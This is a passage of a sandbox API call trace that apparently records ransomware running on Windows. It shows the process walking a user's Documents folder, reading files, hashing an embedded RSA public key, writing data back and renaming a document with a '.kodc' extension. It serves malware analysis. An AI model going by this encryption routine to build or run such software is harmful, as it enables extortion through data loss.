Flags=0x0, Size=0x104) returned 0x9b8c770 [0098.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac40 | out: hHeap=0x630000) returned 1 [0098.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac28 | out: hHeap=0x630000) returned 1 [0098.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.865] GetCurrentThreadId () returned 0x42c [0098.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8fa18 [0098.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.865] GetCurrentThreadId () returned 0x42c [0098.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac28 [0098.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0098.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac40 [0098.867] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xff65, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.867] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.867] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.867] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.867] CloseHandle (hObject=0x5cc) returned 1 [0098.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.868] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xJ2wy0-YqW7HZJEM29.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xj2wy0-yqw7hzjem29.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xJ2wy0-YqW7HZJEM29.rtf.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xj2wy0-yqw7hzjem29.rtf.kodc")) returned 1 [0098.870] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd5109e0, ftCreationTime.dwHighDateTime=0x1d5bcf4, ftLastAccessTime.dwLowDateTime=0xb7cf55d0, ftLastAccessTime.dwHighDateTime=0x1d5ba0c, ftLastWriteTime.dwLowDateTime=0xb7cf55d0, ftLastWriteTime.dwHighDateTime=0x1d5ba0c, nFileSizeHigh=0x0, nFileSizeLow=0x16eef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xQkheU94ecT41Hfv.pptx", cAlternateFileName="XQKHEU~1.PPT")) returned 1 [0098.870] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xQkheU94ecT41Hfv.pptx") returned=".pptx" [0098.870] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xQkheU94ecT41Hfv.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xqkheu94ect41hfv.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.870] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=93935) returned 1 [0098.870] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.873] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x16ec9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.873] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.874] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x16eef, lpOverlapped=0x0) returned 1 [0098.874] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.874] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.874] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.874] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.875] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.875] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.875] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.875] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.875] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.875] GetLastError () returned 0x0 [0098.875] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.875] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.875] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.875] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.875] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.875] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.875] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.875] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.875] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.876] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x16ef0) returned 0x9ba4d90 [0098.876] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.876] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.876] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.876] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.876] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.876] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.876] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d7b0 [0098.876] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331abf8 [0098.876] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d7f8 [0098.876] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac10 [0098.876] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac40 [0098.876] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.876] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac58 [0098.876] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.876] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.876] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.876] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0098.876] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac40 | out: hHeap=0x630000) returned 1 [0098.876] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac58 | out: hHeap=0x630000) returned 1 [0098.876] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.876] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.877] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0098.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ac58 [0098.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0098.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331ac40 [0098.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0098.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0098.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0098.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.877] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.877] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac58 | out: hHeap=0x630000) returned 1 [0098.877] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.877] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac40 | out: hHeap=0x630000) returned 1 [0098.877] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.877] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.877] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.877] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.877] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.877] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.877] GetCurrentThreadId () returned 0x42c [0098.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8faa8 [0098.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.878] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.878] GetCurrentThreadId () returned 0x42c [0098.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.878] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.878] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.878] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.878] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.878] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.878] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac40 [0098.878] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0098.878] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac58 [0098.879] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.879] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac28 [0098.879] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.879] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.879] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.879] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ac70 [0098.879] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a568 [0098.879] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0098.879] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.879] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.879] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac40 | out: hHeap=0x630000) returned 1 [0098.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac40 [0098.879] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.879] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0098.879] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0098.879] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0098.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c540 [0098.879] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0098.879] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac40 | out: hHeap=0x630000) returned 1 [0098.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0098.879] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.880] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: 